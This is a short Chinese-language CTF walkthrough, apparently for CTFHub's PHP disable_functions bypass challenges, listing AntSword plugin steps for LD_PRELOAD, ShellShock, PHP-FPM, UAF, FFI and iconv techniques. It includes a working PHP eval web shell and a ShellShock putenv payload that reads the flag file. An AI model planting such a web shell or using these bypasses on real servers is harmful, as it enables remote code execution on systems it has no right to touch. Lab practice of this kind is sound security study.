LD_PRELOAD
url
蚁剑连接
选择插件
点击开始
查看到此文件名编辑连接拼接到url后面重新连接
点击开启终端
在终端执行命令
ls /
/readfile
ShellShock
url
CTFHub 环境实例 | 提示信息
蚁剑连接
写入shell.php
<?php
@eval($_REQUEST['ant']);
putenv("PHP_test=() { :; }; tac /flag >> /var/www/html/test.php");
error_log("admin",1);
//mail("admin@localhost","","","","");
?>
使用插件
终端执行命令得到flag
Apache Mod CGI
查看GetFlag
蚁剑连接
直接使用工具
终端执行命令
PHP-FPM
蚁剑连接
工具连接
拼接地址
在终端执行命令
GC UAF
蚁剑连接
使用工具
在终端执行命令
Json Serializer UAF
页面
蚁剑连接
使用工具
执行命令
Backtrace UAF
访问页面
蚁剑连接,使用工具
执行命令
FFI
使用工具
执行命令
iconv
使用工具
刷新查看文件
修改连接,拼接地址
终端执行命令
iconv Bypass 1
与icon一样的步骤
iconv Bypass 2
与icon一样的步骤